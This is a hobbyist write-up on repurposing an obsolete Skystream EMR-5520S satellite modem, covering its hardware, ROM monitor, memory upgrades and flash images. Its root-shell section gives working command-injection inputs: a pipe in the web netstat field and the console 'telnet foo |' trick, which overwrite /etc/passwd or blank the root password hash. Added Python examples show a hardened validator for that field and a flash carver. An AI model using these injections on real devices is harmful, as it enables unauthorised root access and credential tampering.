arl: hacking: Skystream Networks EMR-5520S (5)



introduction
The Skystream Networks EMR-5520S/40S Series (Edge Media Router) are satellite modems.
This box is an EMR-5520 S202002P-R-EU-5.

Skystream Networks was bought in 2006 by Tandberg Television, which was bought in 2010 by Ericsson.

The hardware is a MIL grade PowerPC 405GP (PVR: 40110145) 200MHz board with a PC133 memory slot (128MB by default) and 2 PCI slots (PCI-X?).

The boot BIOS is based on openbios.

The operating system is Linux version 2.4.17 and contains BusyBox. No sources are available, and it seems none were released to customers (gpl@busybox.net).
The Linux toolchain for this device has been "powerpc-hardhat-linux-gnu".

The device has a serial console running a specialized program, and a web-based management user interface. No shell-level access at all.

This device is nowadays obsolete as a satellite modem.

why
Some reasons to invest time in this box:
  • Bought ~25 boxes; inexpensive.
  • MIL grade hardware, so it will work for years. Artesyn power supply.
  • Uses 15W.
  • PCI slots (2).
  • Able to increase memory easily and inexpensively.
  • I prefer rack-mountable cases. Small 19" rack case (22.5 cm deep without the plastic bezel).
  • No fans needed: quiet.


usage
Intended uses for this box in my projects:
  • PulseAudio server connecting to my A/V equipment.
    Streaming music from my library.
  • GSF WebCam server video source (PCI card) if I get some old inexpensive Panasonic video cameras.
    This is a surveillance project in a remote location.
  • Fine-tune my CLink system.
    CLink is a multistrategy data converter and formatter suitable for data logging.


hacking
root shell

Hacking is based on two components: (1) busybox is suid root, and (2) poorly implemented additional self-made utility programs by Skystream, like the console command "shell" and the web interfaces.

The operating-system level can be reached through the Diagnostics part of the web user interface, which has a netstat command with a free-text parameter input field:

| dd if=/etc/passwd of=/ftp/passwd
ftp emr5500, get passwd passwd.new
mod root passwd
ftp emr5500, put passwd.new
| dd if=/ftp/passwd.new of=/etc/passwd
ssh emr5500 -l root
sh-2.03# 

Notice: the changed passwd file lives in a RAM filesystem, so a reboot clears it.

Need to do it through the serial console line instead? Here it is:

[xxxxxxxx@emr5500] telnet foo | cat /etc/passwd
root:CRYPT:...
...
[xxxxxxxx@emr5500] telnet foo |	cat /etc/passwd | sed 's%CRYPT%%' | dd of=/etc/passwd
0+1 records in
0+1 records out
[xxxxxxxx@emr5500] telnet foo | cat /etc/passwd
root::0:0:root:/:/bin/sh
...
[xxxxxxxx@emr5500] exit
SkyStream Networks
Edge Media Router
Please login as 'xxxxxxxx' for Command-Line Interface
emr5500 login: root
sh-2.03# 
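Both sessions above work because the netstat field (and the console "shell" command) splice user text into a shell command line that runs as root. The following is an added example, not code from the page or from Skystream: the unsafe concatenation pattern next to a hardened handler that accepts only an allowlist of netstat flags and builds an argv for exec without any shell. The allowlist itself is an assumption; the other half of the fix, removing the suid bit from busybox, is a filesystem change not shown here.

```python
"""Vulnerable string-splicing vs. allowlisted argv for a netstat diagnostics field."""
import re
import shlex
import subprocess

# Assumed allowlist of options the diagnostics page legitimately needs.
ALLOWED_FLAGS = {"-a", "-n", "-t", "-u", "-l", "-r", "-i", "-p"}
_FLAG_RE = re.compile(r"^-[a-z]+$")   # a single cluster of short flags, nothing else


def vulnerable_command_line(field: str) -> str:
    """The pattern the page exploits: the field is appended verbatim and the
    result is handed to /bin/sh, so a leading '|' runs any second command."""
    return "netstat " + field


def validate_netstat_args(field: str) -> list:
    """Hardened: tokenize, expand combined flags (-an -> -a -n), accept only
    allowlisted flags, reject everything else (pipes, redirections, paths)."""
    argv = []
    for tok in shlex.split(field):
        if not _FLAG_RE.match(tok):
            raise ValueError(f"rejected token: {tok!r}")
        for ch in tok[1:]:
            flag = "-" + ch
            if flag not in ALLOWED_FLAGS:
                raise ValueError(f"unknown netstat option: {flag}")
            if flag not in argv:
                argv.append(flag)
    return argv


def run_netstat(field: str) -> str:
    """Run netstat with an argv list only: no shell is involved, so shell
    metacharacters in the field can never be interpreted."""
    argv = ["netstat", *validate_netstat_args(field)]
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout
```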



rom monitor

Took a while to get into the rom monitor...

mtd4 has the parameters for the rom monitor, and contains the line:

Escape=escape;5;10

and the box says when booting:

Enter escape sequence within 5 seconds to access user interface.

and the correct answer was to type: escape
and then you'll end up with:

> help
Valid commands are:
      auto  Boot per boot environment variable settings
      boot  Boot specified image
 bootorder  Set boot order
      help  Display this list of commands
   helpenv  Display help for boot environment variables
      hinv  Display hardware inventory
   netboot  Perform a broadcast BOOTP operation
      ping  Ping test
  printenv  Display all boot environment variables
     reset  Reset the system
    setenv  Set a boot environment variable
   saveenv  Save the current boot environment variables
  unsetenv  Unset a boot environment variable
   version  Display boot version info
> version
EMR-5500 2.5 ROM Monitor (Nov  7 2002)
Golden Gate Version 0.02
compilation time: Nov  7 2002, 14:32:45
        checksum: 0x0112AEEE
> hinv
405 core,16K I/8K D,32K I/32K D
 Processor Version Register: 0x40110145
                  Processor: 200 MHz
        Processor Local Bus: 100 MHz
     On-Chip Peripheral Bus: 50 MHz
    External Peripheral Bus: 50 MHz

128 MB of SDRAM
Inventory of FLASH devices:
  Addr        MB Description
  0xFF000000  16   Boot FLASH (mfg=0xFF, dev=0xFF)

33 MHz PCI Bus
Internal PCI arbiter enabled
PCI devices:
  Bus Dev Vendor Device Class    Rev  Commnd Status
    0   1 0x100B 0x0020 0x020000 0x00 0x0006 0x0290 Network controller



modding
Some minor modding for the box:

  • More memory:

    Amount of SDRAM   = 256 MBytes 
    ...
    Memory: 248104k available (1652k kernel code, 2008k data, 196k init, 0k highmem)
    


    Amount of SDRAM   = 512 MBytes
    ...
    Memory: 505888k available (1652k kernel code, 2008k data, 196k init, 0k highmem)
    


    Even though the machine's embedded Linux 2.4.17 does not work with the larger memory.
  • Linux 2.6.nn installation, hopefully without JTAG.
  • New front panel: get rid of the horrible plastic front panel and replace with a cool aluminium one.


original mtd
mtd3 contains the Linux installations, i.e. kernel and filesystems.

mtd3 is built using the mktree command (2 images (kludge)). hexdump of mtd3:

00000000  00 52 50 4f 00 40 00 00  00 00 38 44 00 00 00 00  |.RPO.@....8D....|

00758000  00 52 50 4f 00 40 00 00  00 00 34 ac 00 00 00 00  |.RPO.@....4.....|

and Linux arch/powerpc/boot/mktree.c:

bt.bb_magic = htonl(0x0052504F);



Copied the kernel and filesystem images using this script:

# kernel 1
dd if=mtd3 skip=21376   bs=1 2>/dev/null | gzip -cd > mtd3.21376.uncompressed
# fs image 1
dd if=mtd3 skip=913440  bs=1 2>/dev/null | gzip -cd > mtd3.913440.uncompressed
# kernel 2
dd if=mtd3 skip=7721808 bs=1 2>/dev/null | gzip -cd > mtd3.7721808.uncompressed
# fs image 2
dd if=mtd3 skip=8667168 bs=1 2>/dev/null | gzip -cd > mtd3.8667168.uncompressed

The starting offsets may be found using "od -Ad -x mtd3" and searching for the gzip magic.
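The same search automated, as an added example (not from the page): it locates the mktree headers by the magic from mktree.c and the gzip members by their magic, then inflates each member the way "dd skip=N | gzip -cd" does, ignoring trailing flash bytes. The image it scans is constructed inline, not the real mtd3, and the mktree header fields after the magic are assumed from the hexdump above.

```python
"""Carve mktree-wrapped gzip images out of a flash partition dump."""
import gzip
import struct
import zlib

MKTREE_MAGIC = b"\x00RPO"        # htonl(0x0052504F) from mktree.c
GZIP_MAGIC = b"\x1f\x8b\x08"     # gzip member header, deflate method


def find_all(data: bytes, magic: bytes) -> list:
    """Every offset at which `magic` occurs (what od + eyeballing finds)."""
    offs, pos = [], data.find(magic)
    while pos != -1:
        offs.append(pos)
        pos = data.find(magic, pos + 1)
    return offs


def inflate_at(data: bytes, offset: int) -> bytes:
    """Inflate the gzip member starting at `offset`; bytes after the member
    end up in unused_data and are ignored, like `gzip -cd` on a dd stream."""
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)   # 16+: expect a gzip wrapper
    return d.decompress(data[offset:])


def carve(image: bytes) -> dict:
    """Map mktree header offsets and each real gzip member to its contents."""
    members = {}
    for off in find_all(image, GZIP_MAGIC):
        try:
            members[off] = inflate_at(image, off)
        except zlib.error:
            pass  # a stray 1f 8b 08 inside other data, not a member
    return {"mktree": find_all(image, MKTREE_MAGIC), "gzip": members}


def build_sample_image() -> bytes:
    """Constructed stand-in for mtd3: two mktree-headed, gzip-compressed blobs
    with erased-flash padding between them (the two-image kludge)."""
    def member(payload: bytes) -> bytes:
        # assumed header layout: magic, dest 0x00400000 (as in the dump), size, 0
        hdr = MKTREE_MAGIC + struct.pack(">III", 0x00400000, len(payload), 0)
        return hdr + b"\x00" * 100 + gzip.compress(payload, mtime=0)
    return member(b"kernel-1 " * 50) + b"\xff" * 512 + member(b"rootfs-1 " * 50)
```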

components
Main board
  • IBM PowerPC 405GP (IBM25PPC405GP-3BE200C)
  • SanDisk SDTNFAH-128 (16MB NAND flash)
  • Xilinx XC9572XL (PLCC)
  • Xilinx Spartan XC2S50 (5C)
  • IDT 74LVC
Ethernet
  • National Semiconductor DP83815DVNG
  • LSI L80225/B
  • Atmel 93C46A


Satellite receiver
  • ST Microelectronics STV0299B
  • Philips TDA8060
  • Philips TSA5059T


links



© arl, updated: 20100504